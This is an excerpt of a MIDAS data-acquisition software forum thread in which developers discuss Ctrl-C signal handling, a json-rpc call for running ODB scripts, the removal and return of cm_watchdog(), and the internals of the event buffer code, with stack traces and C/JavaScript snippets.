> > >     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
> > >     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
> > >     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
> > >     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
> > >     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
> > >     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
> > >     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
> > >     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
> > >     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
> > >     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> > > y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> > > 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
> > >     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
> > >     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> > > alarm.c:310 [opt]
> > >     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
> > >     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
> > >     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
> > >     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
> > >     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> > > odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
> > >     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
> > >     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
> > >     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
    Reply  20 Feb 2019, Konstantin Olchanski, Info, odb needs protection against ctrl-c 
Commit f81ff3c protects db_lock/unlock, but not any of the other functions. What if we press ctrl-c in the middle
of some odb write operation, or in the middle of a memory allocation, etc.?

A sure way to corrupt odb.

Perhaps we should disallow odb access from signal handlers? But we still want to be able to stop midas
programs using ctrl-c, even if the program is in some infinite loop somewhere and is not processing
midas events (no calls to cm_yield(), etc).

Maybe I should change the ctrl-c handler to set a flag for cm_yield() to return SS_EXIT,
and have additional ctrl-c presses do nothing if this flag is already set? (maybe abort() if the user presses ctrl-c 10 times?).
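
Something like this minimal sketch (hypothetical names, not the actual midas implementation; the handler only sets a flag, all odb access stays in normal code):

<pre>
#include &lt;csignal&gt;
#include &lt;cstdlib&gt;

static volatile std::sig_atomic_t ctrlc_count = 0;

extern "C" void ctrlc_flag_handler(int)
{
   // async-signal-safe: only bump a counter, never touch odb from here
   ctrlc_count = ctrlc_count + 1;
   if (ctrlc_count >= 10)
      std::abort();   // last resort if the program is really stuck
}

int main()
{
   std::signal(SIGINT, ctrlc_flag_handler);

   // hypothetical main loop: the flag makes cm_yield() return SS_EXIT,
   // so cm_disconnect_experiment() runs from normal code, not from the handler
   while (ctrlc_count == 0) {
      // int status = cm_yield(100);
      // if (status == SS_ABORT || status == RPC_SHUTDOWN) break;
   }
   // cm_disconnect_experiment();
   return 0;
}
</pre>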

K.O.

> Even with the cm_watchdog signal removed, some trouble from UNIX signals remains.
> 
> This time, when one presses Ctrl-C at the wrong time, the Ctrl-C signal handler will run at the wrong time
> and strange things will happen (including odb corruption).
> 
> In the captured stack trace, I pressed Ctrl-C right when odbedit was inside db_lock_database(). I had to make special
> arrangements to make it happen, but I have seen it happen in normal use when running experiments.
> 
> K.O.
> 
> (lldb) bt
> * thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
>   * frame #0: 0x00007fff6c2ceb66 libsystem_kernel.dylib`__pthread_kill + 10
>     frame #1: 0x00007fff6c499080 libsystem_pthread.dylib`pthread_kill + 333
>     frame #2: 0x00007fff6c22a1ae libsystem_c.dylib`abort + 127
>     frame #3: 0x00000001057ccf95 odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2048 [opt]
>     frame #4: 0x00000001057aed9d odbedit`cm_delete_client_info(hDB=1, pid=46856) at midas.c:1702 [opt]
>     frame #5: 0x00000001057b08fe odbedit`cm_disconnect_experiment at midas.c:2704 [opt]
>     frame #6: 0x00000001057a8231 odbedit`ctrlc_odbedit(i=<unavailable>) at odbedit.cxx:2863 [opt]
>     frame #7: 0x00007fff6c48cf5a libsystem_platform.dylib`_sigtramp + 26
>     frame #8: 0x00007fff6c2ced83 libsystem_kernel.dylib`__semwait_signal + 11
>     frame #9: 0x00007fff6c249724 libsystem_c.dylib`nanosleep + 199
>     frame #10: 0x00007fff6c249586 libsystem_c.dylib`sleep + 41
>     frame #11: 0x00000001057cce6b odbedit`db_lock_database(hDB=<unavailable>) at odb.c:2057 [opt]
>     frame #12: 0x00000001057e129a odbedit`db_get_record_size(hDB=1, hKey=141848, align=8, buf_size=0x00007ffeea44c14c) at odb.c:10232 [opt]
>     frame #13: 0x00000001057e1b58 odbedit`db_get_record1(hDB=1, hKey=141848, data=0x00007ffeea44c320, buf_size=0x00007ffeea44c2a8, align=0, rec_str="[.]\nWrite system message = BOOL : 
> y\nWrite Elog message = BOOL : n\nSystem message interval = INT : 60\nSystem message last = DWORD : 0\nExecute command = STRING : [256] \nExecute interval = INT : 0\nExecute last = DWORD : 
> 0\nStop run = BOOL : n\nDisplay BGColor = STRING : [32] red\nDisplay FGColor = STRING : [32] black\n\n") at odb.c:10390 [opt]
>     frame #14: 0x00000001057f1de3 odbedit`al_trigger_class(alarm_class="Warning", alarm_message="This is an example alarm", first=YES) at alarm.c:389 [opt]
>     frame #15: 0x00000001057f19e8 odbedit`al_trigger_alarm(alarm_name="Example alarm", alarm_message="This is an example alarm", default_class="Warning", cond_str="", type=<unavailable>) at 
> alarm.c:310 [opt]
>     frame #16: 0x00000001057f2c4e odbedit`al_check at alarm.c:655 [opt]
>     frame #17: 0x00000001057b9f88 odbedit`cm_periodic_tasks at midas.c:5066 [opt]
>     frame #18: 0x00000001057ba26d odbedit`cm_yield(millisec=100) at midas.c:5137 [opt]
>     frame #19: 0x00000001057a30b8 odbedit`cmd_idle() at odbedit.cxx:1238 [opt]
>     frame #20: 0x00000001057a92df odbedit`cmd_edit(prompt="[local:javascript1:S]/>", cmd=<unavailable>, dir=(odbedit`cmd_dir(char*, int*) at odbedit.cxx:705), idle=(odbedit`cmd_idle() at 
> odbedit.cxx:1233))(char*, int*), int (*)()) at cmdedit.cxx:235 [opt]
>     frame #21: 0x00000001057a3863 odbedit`command_loop(host_name="", exp_name="javascript1", cmd="", start_dir=<unavailable>) at odbedit.cxx:1435 [opt]
>     frame #22: 0x00000001057a8664 odbedit`main(argc=1, argv=<unavailable>) at odbedit.cxx:2997 [opt]
>     frame #23: 0x00007fff6c17e015 libdyld.dylib`start + 1
Entry  11 Feb 2019, Konstantin Olchanski, Info, json-rpc request for ODB /Script and /CustomScript. 
I added json-rpc requests for ODB /Script and /CustomScript (the first one shows up on the status page in the left hand side menu, the 
second one is "hidden", intended for use by custom pages).

To invoke the RPC method, use the following code (from mhttpd.js). Use parameter "customscript" instead of "script" to execute scripts from ODB 
/CustomScript.

One can identify the version of MIDAS that has this function implemented by looking at the left hand side menu - the script links are replaced by script 
buttons.

<pre>
function mhttpd_exec_script(name)
{
   //console.log("exec_script: " + name);
   var params = new Object;
   params.script = name;
   mjsonrpc_call("exec_script", params).then(function(rpc) {
      var status = rpc.result.status;
      if (status != 1) {
         dlgAlert("Exec script \"" + name + "\" status " + status);
      }
   }).catch(function(error) {
      mjsonrpc_error_alert(error);
   });
}
</pre>

The underlying code moved from mhttpd.cxx to the midas library as cm_exec_script(odb_path);

K.O.
Entry  14 Jan 2019, Becky Chislett, Bug Report, Custom script with new MIDAS 
I am having difficulty getting the custom scripts to work within the updated MIDAS. Before the 
update I was using something like : 

<input type=submit name=customscript value="test">

on my custom page to run a script under /CustomScript/test, however, with the update to 
MIDAS this is no longer working. I can't find any information about this functionality being 
updated in the latest version - has this changed? Or should it still work? 

Thanks,
Becky (g-2 DAQ)
    Reply  18 Jan 2019, Konstantin Olchanski, Bug Report, Custom script with new MIDAS 
> I am having difficulty getting the custom scripts to work within the updated MIDAS. Before the 
> update I was using something like : 
> 
> <input type=submit name=customscript value="test">
> 
> on my custom page to run a script under /CustomScript/test, however, with the update to 
> MIDAS this is no longer working. I can't find any information about this functionality being 
> updated in the latest version - has this changed? Or should it still work? 
> 
> Thanks,
> Becky (g-2 DAQ)

I do not see any messages about anybody changing this function. I hope it did not break by accident.

Right now I am working on the event buffer code, and did not plan to look at mhttpd, but it looks like
your problem is important and there is at least one more problem (but it has a work-around),
so I may look at it sooner rather than later...

K.O.
    Reply  22 Jan 2019, Stefan Ritt, Bug Report, Custom script with new MIDAS 
I just checked that feature and found it's still working as expected. 

One trap I fell into was that a custom page needs the <input type=submit ...> to be embedded into a pair of 

<form>
  ...
</form>

tags in order to work. Otherwise the browser will not execute the submit request. Has nothing to do with midas.

There was a small bug that after executing such a script, the URL was set to http://<host>/CS which is non-existent, 
so I fixed that to redirect to the page which called the script. Submitted to develop branch.
    Reply  24 Jan 2019, Konstantin Olchanski, Bug Report, Custom script with new MIDAS 
> <input type=submit name=customscript value="test">

Stefan is right, input-type-submit has to be inside a form. This type of rpc call is "old school". Today, we should 
have a json-rpc request to execute a custom script.

https://bitbucket.org/tmidas/midas/issues/163/need-json-rpc-method-to-execute-custom

K.O.
Entry  24 Jan 2019, Andreas Suter, Suggestion, json rpc API for history data 
For us it would be a handy feature if history data could be requested directly
from a custom page (time range or run based intervals). Here I am not talking
about history plots but I am talking about recorded time series data. This way
we could easily generate useful graphs. For instance, if we measure the voltage
(constant current) while cooling, we could instantly get the resistance versus
temperature. Often we would like to 'correlate' recorded slow control data.

Is it already possible to extract history data the way suggested?
    Reply  24 Jan 2019, Konstantin Olchanski, Suggestion, json rpc API for history data 
> For us it would be a handy feature if history data could be requested directly
> from a custom page (time range or run based intervals) . Here I am not talking
> about history plots but I am talking about recorded time series data. This way
> we could easily generate useful graphs. For instance, if we measure the voltage
> (constant current) while cooling, we could instantly get the resistance versus
> temperature. Often we would like to 'correlate' recorded slow control data.
> 
> Is it already possible to extract history data the way suggested?

There are sundry hs_read() json rpc methods already implemented in preparation
for writing a javascript based history viewer (this has not happened yet).

You can try to use them, they should work, but have not been tested extensively.

To find this stuff:
a) go to the mhttpd "help" page, open the "json rpc schema in text table format", look for the "hs_xxx" methods.
b) also from the "help" page, open "javascript examples- example.html", scroll down to "hs_get_active_events". Press the buttons, they should 
work, look at the source code to see how to call the rpc methods from your own page.

K.O.
Entry  10 Jan 2019, Konstantin Olchanski, Info, removal of cm_watchdog() 
cm_watchdog() has been removed from the latest midas sources. The watchdog functions performed by cm_watchdog() were 
moved to cm_yield() - namely, maintaining the odb and event buffer "last active" timestamps and checking for and removing 
timed-out clients.

Those who write midas programs should ensure that they call cm_yield() at least every 1-2 seconds (for the normal 10 second 
timeout settings). As always, before calling potentially time consuming operations, such as accessing slow responding 
hardware, one should increase or disable their watchdog timeout.

Those who write midas programs that do not use cm_yield() (i.e. the mserver), should call cm_periodic_tasks() instead with 
the same period as described for cm_yield() above.
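
To make this concrete, here is a minimal sketch (assuming the standard midas C API; cm_set_watchdog_params() is the usual way to adjust the timeout, and talk_to_slow_hardware() is hypothetical):

<pre>
#include "midas.h"

void event_loop()
{
   while (1) {
      int status = cm_yield(100);   // now also runs the watchdog/periodic tasks
      if (status == RPC_SHUTDOWN || status == SS_ABORT)
         break;

      // before a slow operation, extend the watchdog timeout...
      cm_set_watchdog_params(TRUE, 60 * 1000);  // 60 sec instead of the default 10
      // talk_to_slow_hardware();               // hypothetical slow operation
      // ...then restore the normal timeout
      cm_set_watchdog_params(TRUE, 10 * 1000);
   }
}
</pre>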

Removal of cm_watchdog() solves many problems in the midas code base:
- firing of cm_watchdog() at random times in random places makes it difficult to do static code path analysis (call paths, etc) - 
this is needed to ensure correct multithread locking, etc
- ditto caused trouble with multithread locking when cm_watchdog() fires *inside* the pthread mutex locking library itself 
causing mutexes to be in an inconsistent state. This had to be kludged against in the ODB multithread locks - now this kludge 
can be removed.
- much non-midas code in experiment frontends, etc. was not expecting and did not correctly handle firing of the 
cm_watchdog() SIGALRM at random times (i.e. select() with timeout returned too soon, etc).
- today, UNIX signals are pretty obscure, best avoided. (i.e. the interaction of signals and threads is not super well defined, etc).

commits up to (and including) the merge of branch feature/remove_cm_watchdog:
https://bitbucket.org/tmidas/midas/commits/9f1775d2fc75d0de0b9d4ef1abc7b2fb9bacca28

K.O.
    Reply  21 Jan 2019, Konstantin Olchanski, Info, removal of cm_watchdog() 
> cm_watchdog() has been removed from the latest midas sources
> Removal of cm_watchdog() solves many problems in the midas code base:

Removal of cm_watchdog() creates new problems:

a) bm_send_event(BM_WAIT) and bm_receive_event(BM_WAIT), while waiting for free space or waiting for a new event, do not update the timeouts (need to add a call 
to cm_periodic_tasks())
b) frontends that talk to slow external equipment now die unless they have their timeout adjusted to be longer than the longest equipment operation (they 
were already supposed to do this, but...)
c) mhttpd sometimes dies from an odb timeout (with the default 10 sec timeout).

As one solution, we may bring an automatic cm_watchdog() back, but running from a thread instead of from SIGALRM.

K.O.
       Reply  24 Jan 2019, Konstantin Olchanski, Info, removal of cm_watchdog() 
> > cm_watchdog() has been removed from the latest midas sources
> > Removal of cm_watchdog() solves many problems in the midas code base:
> Removal of cm_watchdog() creates new problems:
> a) the bm_send_event(BM_WAIT) and bm_receive_event(BM_WAIT)
> b) frontends that talk to slow external equipment
> c) mhttpd sometimes dies from from an odb timeout (with the default 10 sec timeout).

The watchdog is back, in a "light" form. Added:

- cm_watchdog_thread() - runs every 2 seconds and updates the timestamps on ODB and all open event buffers (SYSMSG, SYSTEM, etc).
- cm_start_watchdog_thread() - added to mfe.c and mhttpd - so user frontends work the same as before cm_watchdog() removal
- cm_stop_watchdog_thread() - added to cm_disconnect_experiment() to avoid leaving the thread running after we closed odb and all event buffers.

As before, the watchdog only runs for locally attached midas programs. For programs attached remotely via the mserver, the mserver handles the watchdog functions.

This new light-weight watchdog thread only updates the timestamps, it does not check and remove dead clients, it does not check the alarms. These functions are now performed 
by cm_yield() and cm_periodic_tasks(). At least some program in an experiment should call them periodically. (normally, at least mlogger and mhttpd will do that).
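
For a non-mfe program, usage could look like this minimal sketch (function names as listed above; exact signatures are assumptions):

<pre>
#include "midas.h"

int main()
{
   cm_connect_experiment("", "", "myprog", NULL);
   cm_start_watchdog_thread();  // updates odb/buffer timestamps every ~2 sec

   // ... long-running work that may not call cm_yield() for a while ...

   cm_disconnect_experiment();  // also stops the watchdog thread
   return 0;
}
</pre>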

Programs that accidentally relied on SIGALRM firing at 1Hz may still be affected - i.e. with the old cm_watchdog(), ::sleep(1000) would only sleep for 1 second (interrupted by 
SIGALRM), now it will sleep for the full 1000 seconds. Other syscalls, i.e. select(), are similarly affected.

For now, I think only mfe.c frontends and mhttpd need the watchdog thread. With luck all the other midas programs (mlogger, mdump, etc) will run fine without it.

K.O.
Entry  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 1 
In this technical note, I write down the workings of the midas event buffer code, the path 
that events travel from the frontend to the SYSTEM buffer to mlogger (and to disk).

The event buffer code has worked well in the past, but more recently we see a few 
problems. There is the event buffer shared memory corruption problem in the alpha-g 
detector daq. There are difficulties with GET_RECENT. There are timeouts in the bm_receive_event 
RPC path in ROME. There is the 2Gbyte limit on the event buffer size (limiting 
maximum event size to about 1Gbyte), due to the 32-bit-ness of the event buffer size code. 
In the day of 10gige networking (1Gbyte/sec) and >1Gbyte/sec storage arrays, a 2Gbyte 
buffer size is just about sufficient. There is a lack of multithread safety in the event buffer 
code. There is the lack of a bm_receive_event() variant where I do not have to guess the maximum 
event size (which would make event truncation impossible).

I have been looking at the event buffer code for many years. It is very well written,
but it is also probably the oldest code inside midas and its age shows. Good code from 
1998 is just very hard to read and follow 20 years later in 2018. We no longer do "goto", we 
are not afraid of using malloc(), we declare variables as we are about to use them (instead 
of at the beginning of a function). The list goes on and on.

So after looking at this code for many years, I finally decided to bite the bullet and 
rewrite/modernize it. To my surprise the code took very well to this. I only had to rewrite 
the parts that use difficult to follow "goto" logic, the rest of the code almost refactored 
itself. I think this is a very good thing, as people already familiar with the old code (Stefan, myself, etc) 
will find that while things moved around, the basic logic remained the same.

But first, we need to understand and write down how the event buffer code works.

to be continued,
K.O.
    Reply  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 2, bm_send_event() 
> In this technical note, I write down the workings of the midas event buffer code
> we need to understand and write down how the event buffer code works.

The data ingress part of the event buffer code is very simple: events are sent to the event buffer via the one 
function bm_send_event(). There is no other way to inject data into an event buffer.

bm_send_event() does this:
= if the write cache is active:
- the new event is written into the local write cache
- if the write cache is full, it is flushed into the event buffer via bm_flush_cache()
- if the new event does not fit into the write cache, the write cache is flushed and the event is written into the 
event buffer (preserving the event ordering).
= if the write cache is inactive, new events are written directly into the event buffer.
= to write an event into the event buffer:
- wait for free space via bm_wait_for_free_space()
- lock buffer semaphore
- copy data into buffer shared memory
- update write pointer
- unlock buffer semaphore
- notify all readers waiting for this event
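
For reference, a typical producer looks roughly like this (a sketch assuming the classic midas C API; the exact bm_send_event() arguments differ between midas versions):

<pre>
#include "midas.h"
#include &lt;string.h&gt;

void send_one_event(INT hbuf)
{
   char buf[sizeof(EVENT_HEADER) + 100];
   EVENT_HEADER *pevent = (EVENT_HEADER *) buf;

   bm_compose_event(pevent, 1 /*id*/, 0 /*mask*/, 100 /*data size*/, 1 /*serial*/);
   memset(pevent + 1, 0, 100);   // fill the 100 data bytes here

   int status = bm_send_event(hbuf, pevent, sizeof(buf), BM_WAIT);
   if (status == BM_ASYNC_RETURN) {
      // only possible with BM_NO_WAIT: buffer was full, event was not written
   }
}
</pre>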

bm_flush_cache() does this:
- wait for free space via bm_wait_for_free_space()
- lock buffer semaphore
- copy events from write cache to buffer shared memory
- at the same time keep track of readers that wait for these events
- update write pointer
- unlock buffer semaphore
- notify all readers waiting for previous cached events

bm_wait_for_free_space() does this:
= if buffer is full and sync_flag==BM_NO_WAIT
- return BM_ASYNC_RETURN immediately
- causing bm_send_event() to immediately return BM_ASYNC_RETURN without writing anything to the event 
buffer
= if buffer is full,
- sleep using ss_suspend(1000, MSG_BM), then check again
- there is no timeout, bm_wait_for_free_space() will wait forever

The most expensive operation when writing to the event buffer is the locking:
we must wait until all readers finish their reading and all other writers finish their writing
and unlock the buffer for us. (read up on "lock fairness and starvation"). In general, the less
locking we do, the better.

To reduce lock contention the event buffer code has a write cache. In theory, when we write
a large number of small events, it is more efficient to "batch" them together, significantly
reducing the number of locking operations "per event". Even if the events are large, if there
is significant lock contention from multiple writers and multiple readers, batching the writes
is still a good idea. The downside of this is the cost of an extra memcpy(). Instead of one memcpy() from
user buffer to the shared memory, we do 2 memcpy() - from user buffer to write cache, then from
write cache to the shared memory. Today's typical PC-type machines have very fast RAM,
so memcpy() is inexpensive. However embedded and low power machines (ARM SoCs, FPGA based SoCs,
etc) tend to have pretty slow memory, so extra memcpy() can be expensive.

The bottom line is that the write cache size should be tuned to the actual use case,
but in general it is less useful at low data rates (hardly any contention for the event buffer locks),
and more useful at high data rates especially with very small event sizes (high overhead from
locking on each event).

Right now the write cache is always enabled for mfe-based frontends:
bm_set_cache_size(..., 0, SERVER_CACHE_SIZE); // 100000 bytes
(perhaps the cache size should be made configurable via ODB /Eq/xxx/Common).

To ensure that events do not sit in the write cache for too long,
mfe-based frontends call bm_flush_cache() about once per second.
(see mfe.c, good luck!)
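
A sketch of what enabling the write cache by hand could look like in a non-mfe producer (the buffer and cache sizes here are a tuning choice, not a recommendation):

<pre>
#include "midas.h"

void open_buffer_with_write_cache(INT *phbuf)
{
   bm_open_buffer("SYSTEM", DEFAULT_BUFFER_SIZE, phbuf);
   bm_set_cache_size(*phbuf, 0, 100000);  // no read cache, 100 kbyte write cache

   // then, in the event loop, flush about once per second so events
   // do not sit in the write cache for too long:
   // bm_flush_cache(*phbuf, BM_NO_WAIT);
}
</pre>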

to be continued,
K.O.
       Reply  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 3, rpc_send_event() 
> In this technical note, I write down the workings of the midas event buffer code
> we need to understand and write down how the event buffer code works.
> bm_send_event() does this ...

When connecting to midas remotely via the mserver, bm_send_event() works as expected through
the MIDAS RPC (RPC_BM_SEND_EVENT).

MIDAS RPC does a lot of work encoding and decoding the data, so for extra efficiency,
mfe-based frontends use rpc_send_event().

rpc_send_event() does this:
- if we are connected locally, call bm_send_event()
- if rpc_mode==0, an RPC_BM_SEND_EVENT request is constructed "by hand" and sent to the mserver, result is same as calling 
bm_send_event() but overhead is reduced because we avoid calling the generic rpc_call().
- if rpc_mode!=0, event data is sent to the mserver by writing it into the event tcp connection (_server_connection.event_sock).
- there is a small (8kbyte) cache for batching tcp writes, probably not useful for modern tcp implementations, but it makes 
rpc_send_event() non thread-safe.

rpc_send_event() is NOT thread safe.
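
For reference, the call as made from an mfe-style frontend looks roughly like this (a sketch; the rpc_mode value comes from the frontend configuration and the exact signature may differ between versions):

<pre>
#include "midas.h"

INT send_event_to_mserver(INT buffer_handle, EVENT_HEADER *pevent, INT rpc_mode)
{
   INT size = sizeof(EVENT_HEADER) + pevent->data_size;

   // NOT thread safe: if the frontend is multithreaded,
   // all calls must come from the same thread (or be serialized)
   return rpc_send_event(buffer_handle, pevent, size, BM_WAIT, rpc_mode);
}
</pre>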

mserver receives event data in rpc_server_receive():
- read the data from the event tcp connection (_server_acception[idx].event_sock) via recv_event_server()
- decode the buffer handle and call bm_send_event(BM_WAIT)
- this is done in a loop for a maximum of 500 msec or until there is no more data in the event tcp connection
- maximum event size that can be received is set by ODB /Experiment/MAX_EVENT_SIZE.

This data path is the most efficient way for sending data from a remote client into midas.

Limitations:
- rpc_send_event() is not thread safe because
a) it uses a small and probably unnecessary data cache and
b) the communication protocol requires 2 syscalls to send an event (1st syscall to send 2 bytes of buffer handle, 2nd syscall to send the 
event data).
- rpc_server_receive() cannot receive arbitrarily large events because recv_event_server() does not know how to allocate memory (it does 
not know the event size).
 
to be continued,
K.O.
          Reply  28 Dec 2018, Konstantin Olchanski, Info, note on the midas event buffer code, part 4, reading from event buffer 
> > In this technical note, I write down the workings of the midas event buffer code
> > we need to understand and write down how the event buffer code works.
> > bm_send_event() does this ...
> rpc_send_event() does this ...
> mserver rpc_server_receive() does this ...

There are two ways to read data from an event buffer.

The first way is to specify an event request without an event handler callback function and use bm_receive_event() to poll for new events.

The second way is to specify an event handler callback function and rely on midas internal event notifications
and polling to receive events via the callback function. The mlogger and mdump utilities use this method.

The third part of this involves delivering event notifications to remote midas clients connected via the mserver.
They cannot receive event buffer notifications directly - the UDP datagrams are sent on the localhost interface
and are received by the mserver which has to forward them to the remote client.

In addition, there is an event buffer read cache, which works similar to the write cache to reduce the number
of buffer lock operations and so reduce the locking overhead and the lock contention.

to be continued,
K.O.
             Reply  02 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 5, bm_read_buffer() 
> > > In this technical note, I write down the workings of the midas event buffer code
> > > we need to understand and write down how the event buffer code works.
> > > bm_send_event() does this ...
> > rpc_send_event() does this ...
> > mserver rpc_server_receive() does this ...
> 
> There are two ways to read data from an event buffer.
>
> The first way is to specify an event request without an event handler callback function and use bm_receive_event() to poll for new events.
> 
> The second way is to specify an even handler callback function and rely on midas internal event notifications
> and polling to receive events via the callback function. The mlogger and mdump utilities use this method.
> 

The two ways of reading events from the event buffer are/were implemented by bm_receive_event() and bm_push_event(). The code
in these two functions is/was identical (as best I can tell) except that the first one copied the event data into a user buffer,
while the second one invoked the user event request callback function via bm_dispatch_event().

In the new code, I have consolidated both functions into one, called bm_read_buffer().

bm_read_buffer() does this:
- if read cache is enabled:
- read events from read cache
- if read cache is empty, fill it from the event buffer shared memory via bm_fill_read_cache()
- if the next event in the event buffer shared memory does not fit into the read cache, filling of the read cache stops
- then events are read from the read cache until it is empty, then we fall through to:
- if the read cache is disabled or the next event in the event buffer does not fit into the read cache,
read the next event directly from the event buffer (at this point, the read cache is empty).

Throughout this activity, all events from the event buffer shared memory that do not match any
event request are skipped. Only events that match an event request are copied into the read cache.

bm_dispatch_event() does this:
- calls some code for event defragmentation (I do not know if this code is used or if it works)
- loop over all event requests, for matching request, call the user event handler function (buffer handle, request id, event header, event data)
- if multiple requests match an event, the user event handler will be called multiple times (once per matching request).

Following functions are now available to the users to read the event buffer:
- bm_push_event(buffer name) - dispatch next event from the read cache or poll the event buffer for new events, fill the read cache and dispatch the next event (via 
bm_dispatch_event()).
- bm_check_buffers() - call bm_push_event() for all open buffers in a loop for about 1000 ms.
- bm_receive_event() - read the next event into the supplied buffer (the buffer should be big enough to fit an event of maximum size, see ODB /Experiment/MAX_EVENT_SIZE).
- bm_receive_event_alloc() - read the next event into an automatically allocated buffer of correct size to fit the event. this buffer should be free()ed after use.
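
To make the callback path concrete, here is a minimal mdump-style consumer (a sketch assuming the classic midas C API):

<pre>
#include "midas.h"
#include &lt;stdio.h&gt;

void process_event(HNDLE hbuf, HNDLE request_id, EVENT_HEADER *pheader, void *pdata)
{
   printf("event id %d, serial %d, size %d\n",
          pheader->event_id, (int) pheader->serial_number, (int) pheader->data_size);
}

int main()
{
   HNDLE hbuf, request_id;
   cm_connect_experiment("", "", "reader", NULL);
   bm_open_buffer("SYSTEM", DEFAULT_BUFFER_SIZE, &hbuf);
   bm_request_event(hbuf, EVENTID_ALL, TRIGGER_ALL, GET_ALL, &request_id, process_event);

   while (cm_yield(1000) != RPC_SHUTDOWN)
      ;   // cm_yield()/bm_check_buffers() poll the buffer and call process_event()

   cm_disconnect_experiment();
   return 0;
}
</pre>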

This is it for the code internals that deal directly with the event data buffers shared memory.

Next to explore is the reading of events through the mserver, the polling of buffers in various programs and the communication between buffer readers and writers.

to be continued,
K.O.
                Reply  02 Jan 2019, Konstantin Olchanski, Info, note on the midas event buffer code, part 6, reading events through the mserver 
> > > > In this technical note, I write down the workings of the midas event buffer code
> > > > we need to understand and write down how the event buffer code works.
> > > > bm_send_event() does this ...
> > > rpc_send_event() does this ...
> > > mserver rpc_server_receive() does this ...
> bm_read_buffer() does this ...
> bm_dispatch_event() does this ...
> - bm_push_event(buffer name) ...
> - bm_check_buffers() - call bm_push_event() for all open buffers ...
> - bm_receive_event() ...
> - bm_receive_event_alloc() ...

There is only one path for midas programs (analyzers, mdumps, etc) connected remotely
through the mserver to receive event data - by using bm_receive_event(). Unlike the mfe
frontend where two paths are possible for sending data - bm_send_event() and rpc_send_event() -
there is no "rpc_recieve_event" alternate data path for receiving data.
Event data can only travel through the RPC_BM_RECEIVE_EVENT RPC call.

So how do the event request callbacks work in a remote-connected client?

a) cm_yield() always calls bm_poll_event() which loops over all requests, calls bm_receive_event() and bm_dispatch_event().
b) ss_suspend() calls rpc_client_dispatch() to receive an MSG_BM message from the mserver and call bm_poll_event(), then as above.

So new events can show up at the user event handler each time we call cm_yield() (poll bm_receive_event()) and
each time we call ss_suspend() (check for MSG_BM message from mserver).

This is how the mserver generates the MSG_BM messages:
- cm_dispatch_ipc receives a "B" message (from the writer to the event buffer)
- calls bm_notify_client(buffer name) (instead of calling bm_push_event() for a normal direct-attached client)
- bm_notify_client() sends the MSG_BM message to the remote client, unless:
-- the remote client did not specify any event handler callbacks (pbuf->callback is false) (they poll for data)
-- previous MSG_BM message was sent less than 500 ms ago.

As best I understand, in the end, this scheme works like this:

- low frequency events (< 1/sec) will always generate an MSG_BM message and cause
the remote client to receive and dispatch this event almost immediately (as soon as it
does the next cm_yield() or ss_suspend()).

- high frequency events (> 2/sec) will have the MSG_BM messages throttled by the 500 ms blank-off
in bm_notify_client() and will be processed almost exclusively by polling via cm_yield().

Additional gotchas.

a) polling for events via bm_receive_event() without BM_NO_WAIT will cause serious problems. Because
internally, bm_receive_event() does not have a timeout, it will wait for new data forever, stalling
the RPC_BM_RECEIVE_EVENT request. Normally, rpc_call(RPC_BM_RECEIVE_EVENT) will timeout,
but the bm_receive_event() function disables this timeout, so for the remotely connected client,
the rpc call will hang forever. This creates two problems:
a1) if this is a multithreaded client and another thread tries to do another RPC call (i.e. access odb, etc), there will be a crash waiting for the RPC mutex (timeout is 10 sec, see 
rpc_call(); in this case, rpc_timeout is zero)
a2) if a run stop is attempted, the RPC call from cm_transition() will timeout and cause this client to be killed. This is because while waiting for an RPC reply, we do not listen for and process 
incoming RPC requests. (waiting is done inside ss_socket_wait() through recv_tcp2() and ss_recv_net_command()).
